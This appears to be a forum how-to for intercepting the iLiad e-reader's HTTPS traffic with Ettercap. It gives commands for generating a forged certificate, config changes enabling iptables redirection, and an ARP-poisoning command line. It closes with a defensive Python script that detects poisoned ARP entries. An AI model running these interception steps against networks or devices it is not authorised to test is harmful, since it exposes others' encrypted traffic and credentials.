SSL MITM attack on the iLiad reader
Requirement:
OpenSSL libraries, so that Ettercap has SSL and TLS support
To sniff an HTTPS connection with Ettercap, we must set up two separate SSL tunnels. Essentially we first ARP poison the iLiad and the gateway (as described earlier), then intercept the iLiad's SSL request and present it with our own certificate. When the iLiad accepts the certificate, Ettercap establishes an SSL tunnel from the device to itself, masquerading as the iDS server. It then establishes a second SSL tunnel to the real web server, with itself as the SSL client.
- We have to create our SSL certificate (if your installation of Ettercap didn't do it already for you):
Code:
openssl genrsa -out etter.ssl.crt 1024
openssl req -new -key etter.ssl.crt -out tmp.csr
openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.new
cat tmp.new >> etter.ssl.crt
rm -f tmp.new tmp.csr
cp etter.ssl.crt /usr/local/share/ettercap   # path can differ depending on your installation of Ettercap
- Edit /etc/etter.conf and make the following important changes:
- ec_uid=0 (otherwise Ettercap drops root privileges and cannot manage the iptables rules needed to establish the forwarding)
- Further down the config file, uncomment the firewall rules that apply to your sniffing host. For instance, if you run Linux with iptables (most likely), uncomment the lines as in the following example:
Code:
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- iptables -N nat (to create the iptables nat table)
- Start sniffing as explained before:
- ettercap -Tq -L /tmp/logfile.log -M arp:remote /192.168.0.1/ /192.168.0.10/ (here the router is 192.168.0.1 and the iLiad is 192.168.0.10)
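From the defender's side, the ARP stage described above leaves two tell-tale signs in a neighbour table: the gateway's IP resolves to a MAC other than its recorded one, and a single MAC answers for more than one IP. The following is an added example, not part of the original post: it parses constructed `ip neigh` output and checks it against an assumed known-good baseline (the addresses and MACs are made up for the example).

```python
"""Flag ARP-cache entries consistent with a poisoned client/gateway pair.
Constructed example; the sample table and baseline MACs are invented."""
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output as recorded on a host in the
# poisoned pair: the gateway (192.168.0.1) and the reader (192.168.0.10)
# both resolve to one MAC, which is not the gateway's recorded MAC.
SAMPLE_NEIGH = """\
192.168.0.1 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
192.168.0.10 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
192.168.0.20 dev eth0 lladdr 00:1e:4f:11:22:33 REACHABLE
192.168.0.30 dev eth0 FAILED
"""

# Assumed known-good mapping, recorded while the LAN was trusted (hypothetical).
BASELINE = {"192.168.0.1": "00:50:56:01:02:03"}

LINE_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17})", re.I)


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh` lines; entries without an lladdr
    (e.g. FAILED or INCOMPLETE) carry no MAC and are skipped."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def arp_alerts(table, baseline):
    """Return sorted alert strings for baseline mismatches and shared MACs.
    A shared MAC can be legitimate (a router holding several IPs, a VM host),
    so treat it as a lead to investigate rather than proof of poisoning."""
    alerts = []
    for ip, mac in baseline.items():
        seen = table.get(ip)
        if seen is not None and seen != mac.lower():
            alerts.append(f"baseline-mismatch {ip} expected {mac.lower()} saw {seen}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"shared-mac {mac} claimed by {','.join(sorted(ips))}")
    return sorted(alerts)


if __name__ == "__main__":
    for alert in arp_alerts(parse_neigh(SAMPLE_NEIGH), BASELINE):
        print(alert)
```

On a live host, feed it the output of `ip neigh show` instead of the sample string and keep the baseline in a file you record while the network is known to be clean.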